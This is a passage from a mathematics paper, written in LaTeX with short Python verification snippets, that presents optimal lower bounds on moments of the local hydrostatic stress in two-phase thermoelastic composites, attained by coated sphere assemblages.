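hyd = np.einsum('ijkl,kl->ij', PH, sigma)      # P^H sigma
assert np.allclose(hyd, np.trace(sigma) / d * delta)

# P^H and P^D are complementary projections: P^H P^H = P^H and P^D P^H = 0
assert np.allclose(np.einsum('ijmn,mnkl->ijkl', PH, PH), PH)
assert np.allclose(np.einsum('ijmn,mnkl->ijkl', PD, PH), 0.0)
```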
\bigskip
\section{Stress and strain fields inside heterogeneous thermoelastic\\ media with imposed macroscopic loading}
\label{Prestress Problem}
Several distinct physical processes can generate prestress within heterogeneous media. In many cases it is generated by a mismatch between the coefficients of thermal expansion of the component materials. To fix ideas we present the
physical model associated with this situation. The tensors of thermal expansion inside each phase are given by $\lambda_1=h_1 I$ and $\lambda_2=h_2 I$ where $I$ is the $3\times 3$ identity. The elastic properties of each component are specified by the elasticity tensors $C_1$ and $C_2$ respectively. In this treatment we consider heterogeneous elastically isotropic materials and
the elasticity tensors of materials one and two are specified by
\begin{eqnarray}
C_i=3k_i\mathbb{P}^H+2\mu_i\mathbb{P}^D, \hbox{ $i=1,2.$}
\label{elastconst}
\end{eqnarray}
Without loss of generality we adopt the convention
\begin{eqnarray}
\mu_1>\mu_2.
\label{order}
\end{eqnarray}
The elastic displacement inside the composite is denoted by $\textbf{u}$ and the associated strain tensor is denoted by $\epsilon (\textbf{u})$. The position dependent elastic tensor and thermal expansion tensor for the heterogeneous medium are denoted by $C(\textbf{x})$ and $\lambda(\textbf{x})$ respectively, where $\textbf{x}$ denotes a point inside the medium. The domain containing the composite is given by a cube $Q$ of unit side length. Here it is supposed that $Q$ is the period cell for an infinite elastic medium. In what follows the integral of a quantity $q$ over the unit cube $Q$ is denoted by $\langle q \rangle$.
A constant macroscopic stress $\overline{\sigma}$ and a uniform change in temperature $\Delta T$ are imposed upon the heterogeneous material. The local stress inside the heterogeneous medium is expressed as the sum of a periodic mean zero fluctuation $\hat{\sigma}$
and $\overline{\sigma}$, i.e., $\sigma(\textbf{x})=\overline{\sigma}+\hat\sigma(\textbf{x})$ with $\langle\hat{\sigma}\rangle=0$. Elastic equilibrium inside each phase is given by:
\begin{eqnarray}
div \sigma =0.
\label{equlib}
\end{eqnarray}
The local elastic strain $\epsilon(\u)$ is related to the local stress through the constitutive law
\begin{eqnarray}
\sigma(\textbf{x})=C(\textbf{x})(\epsilon (\textbf{u}(\textbf{x}))-\lambda(\textbf{x})\Delta T),
\label{constitutive}
\end{eqnarray}
and the local elastic field is written in the form
\begin{eqnarray}
\epsilon(\u)=\overline{\epsilon}+\epsilon(\u^{per})
\label{epsilon}
\end{eqnarray}
where $\u^{per}$ is $Q$-periodic, taking the same values on opposite sides of the period cell,
and $\langle\epsilon(\u^{per})\rangle=0$.
Perfect contact between the component materials is assumed, thus
both the displacement ${\u}$ and traction $\sigma\textbf{n}$ are
continuous across the two phase interface, i.e.,
\begin{eqnarray}
\label{equlibbdry1}
{\u}_{|_{\scriptscriptstyle{1}}}&=&{\u}_{|_{\scriptscriptstyle{2}}},\,\,\\
\label{equlibbdry2}
\sigma_{|_{\scriptscriptstyle{1}}} \textbf{n}&=&\sigma_{|_{\scriptscriptstyle{2}}} \textbf{n}.
\end{eqnarray}
Here the subscripts indicate the side of the interface
that the displacement and traction fields are evaluated on and $\textbf{n}$ denotes the normal vector to the interface pointing from material one into material two.
The effective ``macroscopic'' constitutive law for the heterogeneous medium is given by the constant effective elasticity tensor $C^e$ and effective thermal stress tensor $H^e$ that provide the linear relation between the imposed macroscopic stress $\bar{\sigma}$, uniform change in temperature $\Delta T$, and the average strain $\bar{\epsilon}$ given by \cite{Milton},
\begin{eqnarray}
\bar{\sigma}=C^e\bar{\epsilon}+H^e \Delta T.
\label{effelast}
\end{eqnarray}
Here the components of $C^e$ are given by
\begin{eqnarray}
C^e_{ijkl}=\langle C_{ijmn}(x)(\epsilon(\varphi^{kl})_{mn}+\bar{\epsilon}^{kl}_{mn})\rangle,
\label{effectelast}
\end{eqnarray}
where the fields $\varphi^{ij}$ are the periodic solutions of
\begin{eqnarray}
div (C(x)(\epsilon(\varphi^{kl})+\bar{\epsilon}^{kl}))= 0 \quad\text{inside each phase },
\label{basis}
\end{eqnarray}
with the appropriate traction and continuity conditions along the two phase interface given by
\begin{eqnarray}
\label{equlibbdry1e}
{\varphi^{kl}}_{|_{\scriptscriptstyle{1}}}&=&{\varphi^{kl}}_{|_{\scriptscriptstyle{2}}},\,\,\\
\label{equlibbdry2e}
C_1\left(\epsilon(\varphi^{kl})+\bar{\epsilon}^{kl}\right)_{|_{\scriptscriptstyle{1}}} \textbf{n}&=&C_2\left(\epsilon(\varphi^{kl})+\bar{\epsilon}^{kl}\right)_{|_{\scriptscriptstyle{2}}} \textbf{n}.
\end{eqnarray}
The effective thermal stress tensor $H^e$ is given by
\begin{eqnarray}
H^e=\langle C(x)(\epsilon(\varphi^p)-\lambda(\textbf{x})) \rangle.
\label{effectethstress}
\end{eqnarray}
where $\varphi^p$ is the periodic solution of
\begin{eqnarray}
div (C(x)(\epsilon({\varphi}^p)-\lambda(\textbf{x})))= 0 \quad\text{inside each phase },
\label{prestressequlib}
\end{eqnarray}
with the traction and continuity conditions along the two phase interface given by
\begin{eqnarray}
\label{equlibbdry1p}
{\varphi^p}_{|_{\scriptscriptstyle{1}}}&=&{\varphi^p}_{|_{\scriptscriptstyle{2}}},\,\,\\
\label{equlibbdry2p}
C_1\left(\epsilon(\varphi^p)-\lambda_1\right)_{|_{\scriptscriptstyle{1}}} \textbf{n}&=&C_2\left(\epsilon(\varphi^p)-\lambda_2\right)_{|_{\scriptscriptstyle{2}}} \textbf{n}.
\end{eqnarray}
From linearity it follows that the local fluctuating strain field is
given by the sum
\begin{eqnarray}
\epsilon(\u^{per})=\epsilon(\varphi^{kl})\bar{\epsilon}^{kl}+\epsilon(\varphi^p)\Delta T.
\label{linear}
\end{eqnarray}
We write $\varphi^e=\varphi^{kl}\bar{\epsilon}^{kl}$ and from linearity one has the expression for $C^e\bar{\epsilon}$ given by
\begin{eqnarray}
\label{otherconstitut}
C^e\bar{\epsilon}=\langle C(\textbf{x})(\epsilon(\varphi^e)+\bar{\epsilon})\rangle.
\end{eqnarray}
In this article the imposed mechanical stress is given by a constant hydrostatic stress
\begin{eqnarray}
\bar{\sigma}=\sigma_0 I,
\label{imposedstress}
\end{eqnarray}
where $\sigma_0$ can assume any value in $-\infty<\sigma_0<\infty$.
We introduce a method for obtaining optimal lower bounds on the higher moments of the hydrostatic component
of the local stress inside the composite when it is subjected to an imposed hydrostatic load $\sigma_0 I$ and temperature change $\Delta T$. Here no restriction is placed on $\Delta T$.
The volume fractions of materials one and two are denoted by $\theta_1$ and $\theta_2$ and the average of a quantity $q$ over material one is denoted by $\langle q\rangle_1$ and over material two by $\langle q \rangle_2$.
In the following section we present optimal lower bounds on the following moments of the local hydrostatic stress $\mathbb{P}^H\sigma(\textbf{x})$ over the domain occupied by each material
given by
\begin{eqnarray}
\langle|\mathbb{P}^H\sigma(\textbf{x})|^p\rangle_1^{1/p} &\hbox{ and }&\langle|\mathbb{P}^H\sigma(\textbf{x})|^p\rangle_2^{1/p},
\label{locstressmoment}
\end{eqnarray}
for $1< p\leq\infty$,
as well as for the maximum local hydrostatic stress over the whole composite domain
\begin{eqnarray}
\max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}.
\label{locstressmaxeverything}
\end{eqnarray}
We point out that the case $p=\infty$ in (\ref{locstressmoment}) corresponds to
lower bounds on the maximum local hydrostatic stress over each phase
\begin{eqnarray}
\max_{\textbf{x}\hbox{ \tiny in material 1}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}, && \max_{\textbf{x}\hbox{ \tiny in material 2}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}.
\label{locstressmaxphase}
\end{eqnarray}
The lower bounds are given in terms of the volume fractions $\theta_1$ and $\theta_2$, as well as the bulk and shear moduli $k_1$, $k_2$, $\mu_1$, $\mu_2$, and the coefficients of thermal expansion $h_1$ and $h_2$. The lower bounds are described by the following characteristic combinations of these parameters given by:
\begin{eqnarray}
L_1&=& \frac{k_1(k_2+\frac{4}{3}\mu_2)}{k_1k_2+(k_1\theta_1+k_2\theta_2)\frac{4}{3}\mu_2},\label{L1}\\
L_2&=& \frac{k_2(k_1+\frac{4}{3}\mu_1)}{k_1k_2+(k_1\theta_1+k_2\theta_2)\frac{4}{3}\mu_1},\label{L2}\\
M_1&=& \frac{k_1(k_2+\frac{4}{3}\mu_1)}{k_1k_2+(k_1\theta_1+k_2\theta_2)\frac{4}{3}\mu_1},\label{M1}\\
M_2&=& \frac{k_2(k_1+\frac{4}{3}\mu_2)}{k_1k_2+(k_1\theta_1+k_2\theta_2)\frac{4}{3}\mu_2},\label{M2}
\end{eqnarray}
\begin{eqnarray}
D&=&\Delta T(\frac{3k_1k_2(h_2-h_1)}{k_2-k_1}),\label{D}
\end{eqnarray}
and
\begin{eqnarray}
F&=&D(1-\frac{1}{\frac{L_1+M_2}{2}}).
\label{F}
\end{eqnarray}
For elastically well--ordered materials, $k_1>k_2$,
one has $L_1>1>L_2$ and $M_1>1>M_2$; for the non well--ordered case, $k_2>k_1$, one has $L_2>1>L_1$ and $M_2>1>M_1$.
The lower bounds are shown to be attained by the local fields inside the coated sphere assemblages introduced in \cite{hscoated}.
The lower bounds presented here include the effects of thermal stresses due to thermal loads and reduce to the optimal bounds reported in \cite{Lipstress} when $\Delta T=0$.
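The ordering claims for $L_1$, $L_2$, $M_1$, $M_2$ stated above can be confirmed numerically from the defining formulas \eqref{L1}--\eqref{M2}. The short Python sketch below does so with illustrative moduli and volume fractions (hypothetical values, not taken from the paper).

```python
def params(k1, k2, mu1, mu2, t1, t2):
    """Evaluate L1, L2, M1, M2 from their defining formulas."""
    den = lambda mu: k1 * k2 + (k1 * t1 + k2 * t2) * (4.0 / 3.0) * mu
    L1 = k1 * (k2 + (4.0 / 3.0) * mu2) / den(mu2)
    L2 = k2 * (k1 + (4.0 / 3.0) * mu1) / den(mu1)
    M1 = k1 * (k2 + (4.0 / 3.0) * mu1) / den(mu1)
    M2 = k2 * (k1 + (4.0 / 3.0) * mu2) / den(mu2)
    return L1, L2, M1, M2

# Well ordered: k1 > k2 and mu1 > mu2
L1, L2, M1, M2 = params(k1=10.0, k2=3.0, mu1=5.0, mu2=1.0, t1=0.4, t2=0.6)
assert L1 > 1 > L2 and M1 > 1 > M2

# Non well ordered: k2 > k1 with mu1 > mu2
L1, L2, M1, M2 = params(k1=3.0, k2=10.0, mu1=5.0, mu2=1.0, t1=0.4, t2=0.6)
assert L2 > 1 > L1 and M2 > 1 > M1
```

The orderings follow because, for example, the numerator of $L_1$ exceeds its denominator by $\frac{4}{3}\mu_2\theta_2(k_1-k_2)$, whose sign is set by $k_1-k_2$.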
\section{Lower bounds on local stress for elastically well-ordered thermoelastic composite media}
\label{sec-optstresshydrowell}
In this section it is
assumed that the materials inside the heterogeneous medium are elastically well-ordered, i.e., $\mu_1>\mu_2$ and $k_1>k_2$.
We present lower bounds that are optimal for the full range of imposed hydrostatic stresses, i.e., $-\infty<\sigma_0<\infty$ as well as for unrestricted choices of $\Delta T$. The configurations that attain the bounds are given by the coated sphere assemblages \cite{hscoated}. To fix ideas we describe the coated sphere assemblage made from a core of material one with a coating of material two.
We first fill the cube $Q$ with an assemblage of spheres with sizes ranging down to the infinitesimal. Inside each sphere
one places a smaller concentric sphere filled with ``core'' material
one, and the surrounding coating is filled with material two. The volume fractions of materials one and two are taken to be the same for all of the coated spheres.
In what follows we list the lower bounds for the well ordered case. These bounds are derived in Section 5. Their optimality follows from explicit formulas for the moments of the local fields inside the coated sphere assemblage; these are discussed and presented in Section 5.
The first set of bounds apply to all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}$ for $1< p\leq\infty$.
We suppose that $h_2>h_1$, fix $\Delta T$, and list the bounds as a function of the imposed macroscopic stress $\sigma_0$. The bounds are displayed in the following table, where the optimal microstructures are given by the coated spheres construction. The coating and core phases of the optimal configuration are listed in the table below.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq
\sqrt{3}[(D-\sigma_0)L_2-D] & Core material 2 and coating material 1 \\ \hline
D\leq \sigma_0\leq D(1-\frac{1}{M_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(D-\sigma_0)M_2-D]& Core material 1 and coating material 2\\ \hline
D(1-\frac{1}{M_2})< \sigma_0< D(1-\frac{1}{L_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq 0& Optimality undetermined \\ \hline
D(1-\frac{1}{L_2})\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)L_2+D]& Core material 2 and coating material 1\\ \hline
\end{array}
$$
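As a consistency check on the table, adjacent rows agree where their ranges meet, and the bound vanishes exactly at the edges of the window where optimality is undetermined: at $\sigma_0=D(1-1/M_2)$ the second row gives $\sqrt{3}[(D/M_2)M_2-D]=0$, and likewise the fourth row vanishes at $\sigma_0=D(1-1/L_2)$. The sketch below evaluates the piecewise bound with hypothetical parameter values; $D=-2$ is illustrative, and $D<0$ is consistent with \eqref{D} for well ordered moduli, $h_2>h_1$, and $\Delta T>0$.

```python
import math

# Illustrative well-ordered moduli (k1 > k2, mu1 > mu2); none of these
# values come from the paper.
k1, k2, mu1, mu2, t1, t2 = 10.0, 3.0, 5.0, 1.0, 0.4, 0.6
den = lambda mu: k1 * k2 + (k1 * t1 + k2 * t2) * (4.0 / 3.0) * mu
L2 = k2 * (k1 + (4.0 / 3.0) * mu1) / den(mu1)
M2 = k2 * (k1 + (4.0 / 3.0) * mu2) / den(mu2)
D = -2.0

def bound_2(s0):
    """Piecewise lower bound on <|P^H sigma|^p>_2^{1/p} from the table above."""
    if s0 <= D:
        return math.sqrt(3.0) * ((D - s0) * L2 - D)
    if s0 <= D * (1.0 - 1.0 / M2):
        return math.sqrt(3.0) * ((D - s0) * M2 - D)
    if s0 < D * (1.0 - 1.0 / L2):
        return 0.0
    return math.sqrt(3.0) * ((s0 - D) * L2 + D)

# Rows one and two agree at sigma_0 = D, and the bound vanishes at the
# edges of the window where optimality is undetermined.
assert abs(bound_2(D) - math.sqrt(3.0) * (-D)) < 1e-12
assert abs(bound_2(D * (1.0 - 1.0 / M2))) < 1e-12
assert abs(bound_2(D * (1.0 - 1.0 / L2))) < 1e-12
```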
Next we suppose that $h_1>h_2$ and present optimal lower bounds on $\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}$, for $1< p\leq\infty$. The bounds and associated optimal microstructures are given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D(1-\frac{1}{L_2})& \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(D-\sigma_0)L_2-D] & Core material 2 and coating material 1 \\ \hline
D(1-\frac{1}{L_2})< \sigma_0< D(1-\frac{1}{M_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq 0 & Optimality undetermined\\ \hline
D(1-\frac{1}{M_2})\leq\sigma_0\leq D &\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material 2\\ \hline
D\leq \sigma_0 <\infty& \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)L_2+D]& Core material 2 and coating material 1\\ \hline
\end{array}
$$
Lower bounds and the associated optimal microstructures for all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}$ for $1< p\leq\infty$ for the case $h_2>h_1$ are given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)L_1-D] & Core material 1 and coating material 2 \\ \hline
D\leq \sigma_0\leq D(1-\frac{1}{M_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)M_1-D]& Core material 2 and coating material 1\\ \hline
D(1-\frac{1}{M_1})< \sigma_0< D(1-\frac{1}{L_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq 0& Optimality undetermined\\ \hline
D(1-\frac{1}{L_1})\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material 1 and coating material 2\\ \hline
\end{array}
$$
Lower bounds and the associated optimal microstructures for all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}$ for $1< p\leq \infty$ for the case $h_1>h_2$ are given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D(1-\frac{1}{L_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)L_1-D] & Core material 1 and coating material 2 \\ \hline
D(1-\frac{1}{L_1})< \sigma_0< D(1-\frac{1}{M_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq 0 & Optimality undetermined\\ \hline
D(1-\frac{1}{M_1})\leq\sigma_0\leq D & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)M_1+D]& Core material 2 and coating material 1\\ \hline
D\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material 1 and coating material 2\\ \hline
\end{array}
$$
Next we display lower bounds on $\max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}$.
We start with the case $h_2>h_1$ and the lower bounds and optimal geometries are given in the following table.
The phase in which the maximum is attained is denoted with an asterisk.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)L_1-D] & Core material $1^*$ and coating material 2 \\ \hline
D\leq \sigma_0\leq F & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)M_2-D]& Core material 1 and coating material $2^*$\\ \hline
F\leq \sigma_0<\infty & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material $1^*$ and coating material 2\\ \hline
\end{array}
$$
Lower bounds and optimal microgeometries for the case $h_1>h_2$ are given in the following table.
The phase in which the maximum is attained is denoted with an asterisk.
$$
\begin{array}{|l|l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq F & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)L_1-D] & Core material $1^*$ and coating material 2 \\ \hline
F\leq \sigma_0\leq D & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material $2^*$\\ \hline
D\leq \sigma_0 <\infty & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material $1^*$ and coating material 2\\ \hline
\end{array}
$$
\section{Lower bounds on local stress for non well-ordered thermoelastic composite media}
\label{sec-optstresshydrononwell}
In this section it is
assumed that the materials inside the heterogeneous medium are elastically non well-ordered, i.e., $\mu_1>\mu_2$ and $k_2>k_1$.
We fix $\Delta T$ and present lower bounds that are optimal for the full range of imposed hydrostatic stresses, i.e., $-\infty<\sigma_0<\infty$. The configurations that attain the bounds for the non well-ordered case are also given by the coated sphere assemblages \cite{hscoated}.
In what follows we list the lower bounds for the non well-ordered case. These bounds are derived in Section 5. Their optimality follows from explicit formulas for the moments of the local fields inside the coated sphere assemblage; these are discussed and presented in Section 5.
The first set of bounds apply to all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}$ for $1<p\leq\infty$.
We suppose that $h_2>h_1$ and list the bounds as a function of the imposed macroscopic stress $\sigma_0$. The bounds are displayed in the following table, where the optimal microstructures are given by the coated spheres construction. The coating and core phases of the optimal coated sphere configuration are listed in the table below.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D(1-\frac{1}{M_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq
\sqrt{3}[(D-\sigma_0)M_2-D] & Core material 1 and coating material 2 \\ \hline
D(1-\frac{1}{M_2})\leq \sigma_0\leq D(1-\frac{1}{L_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq 0 & Optimality undetermined\\ \hline
D(1-\frac{1}{L_2})< \sigma_0< D & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)L_2+D]& Core material 2 and coating material 1 \\ \hline
D\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material 2\\ \hline
\end{array}
$$
Next we suppose that $h_1>h_2$ and present optimal lower bounds on $\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}$, for $1< p\leq\infty$. The bounds and associated optimal microstructures are given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D& \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(D-\sigma_0)M_2-D] & Core material 1 and coating material 2 \\ \hline
D< \sigma_0< D(1-\frac{1}{L_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(D-\sigma_0)L_2-D] & Core material 2 and coating material 1\\ \hline
D(1-\frac{1}{L_2})\leq\sigma_0\leq D(1-\frac{1}{M_2}) &\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq 0& Optimality undetermined\\ \hline
D(1-\frac{1}{M_2})\leq \sigma_0 <\infty& \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material 2\\ \hline
\end{array}
$$
Lower bounds and the associated optimal microstructures for all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}$ for $1< p\leq\infty$ for the case $h_2>h_1$ are given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D(1-\frac{1}{M_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)M_1-D] & Core material 2 and coating material 1 \\ \hline
D(1-\frac{1}{M_1})\leq \sigma_0\leq D(1-\frac{1}{L_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq 0& Optimality undetermined\\ \hline
D(1-\frac{1}{L_1})< \sigma_0< D & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq \sqrt{3}[(\sigma_0-D)L_1+D]& Core material 1 and coating material 2\\ \hline
D\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)M_1+D]& Core material 2 and coating material 1\\ \hline
\end{array}
$$
Lower bounds and the associated optimal microstructures for all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}$ for $1< p\leq \infty$ for the case $h_1>h_2$ are given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)M_1-D] & Core material 2 and coating material 1 \\ \hline
D< \sigma_0< D(1-\frac{1}{L_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq \sqrt{3}[(D-\sigma_0)L_1-D] & Core material 1 and coating material 2\\ \hline
D(1-\frac{1}{L_1})\leq\sigma_0\leq D(1-\frac{1}{M_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq 0& Optimality undetermined\\ \hline
D(1-\frac{1}{M_1})\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)M_1+D]& Core material 2 and coating material 1\\ \hline
\end{array}
$$
Next we display lower bounds on $\max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}$.
We start with the case $h_2>h_1$ and the lower bounds and optimal geometries are given in the following table.
The phase in which the maximum is attained is denoted by an asterisk.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq F & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)M_2-D] & Core material 1 and coating material $2^\ast$ \\ \hline
F\leq \sigma_0\leq D & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material $1^\ast$ and coating material 2\\ \hline
D\leq \sigma_0<\infty & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material $2^\ast$\\ \hline
\end{array}
$$
Lower bounds and optimal microgeometries for the case $h_1>h_2$ are given in the following table.
The phase in which the maximum is attained is denoted by an asterisk.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
\hbox{Range} & \hbox{Lower Bound} & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)M_2-D] & Core material 1 and coating material $2^\ast$ \\ \hline
D\leq \sigma_0\leq F & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)L_1-D]& Core material $1^\ast$ and coating material 2\\ \hline
F\leq \sigma_0 <\infty & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material $2^\ast$\\ \hline
\end{array}
$$
\bigskip
\section{Derivation of the lower bounds on $\langle|\mathbb{P}^H\sigma|^p\rangle_i^{1/p}$}
\label{lower bound 2}
In this section we outline the methodology for proving optimal lower bounds.
The bounds are derived using duality relations. We use the following duality relation posed over the space of square integrable symmetric matrix fields $\eta$ that holds for $p>1$ given by
\begin{eqnarray}
\frac{1}{p}\langle|\mathbb{P}^H\sigma|^p\rangle_i=\sup_{\eta}\left\{\langle\mathbb{P}^H\sigma: \eta\rangle_i-\frac{1}{p'}\langle|\eta|^{p'}\rangle_i \right\},\hbox{ for $i=1,2$,}
\label{vec1}
\end{eqnarray}
where $p'$ is the conjugate exponent to $p$ given by $p'=\frac{p}{p-1}$.
This relation follows immediately from standard duality relations; see \cite{Dacorogna}.
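In the scalar case the duality relation reduces to the Legendre transform identity $\frac{1}{p}|a|^p=\sup_\eta\{a\eta-\frac{1}{p'}|\eta|^{p'}\}$, with the supremum attained at $\eta=|a|^{p-2}a$. The brief numerical sketch below (illustrative values only) confirms this by maximizing over a grid.

```python
import numpy as np

p = 3.0
pp = p / (p - 1.0)        # conjugate exponent p' = p/(p-1)
a = 1.7                   # plays the role of the pairing P^H sigma : eta

# Maximize a*eta - |eta|^{p'}/p' over a fine grid of trial eta values.
etas = np.linspace(-5.0, 5.0, 1_000_001)
sup_val = np.max(a * etas - np.abs(etas) ** pp / pp)

# The supremum equals |a|^p / p, attained at eta = |a|^{p-2} a = a^{p-1}.
assert abs(sup_val - abs(a) ** p / p) < 1e-6
```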
Restricting $\eta$ to the set of all constant matrices and taking the supremum delivers the basic bounds:
\begin{eqnarray}
\langle|\mathbb{P}^H\sigma|^p\rangle_i&\geq &|\langle\mathbb{P}^H\sigma\rangle_i|^p,\hbox{ for $p>1$ and $i=1,2$}.
\label{vecbound2}
\end{eqnarray}
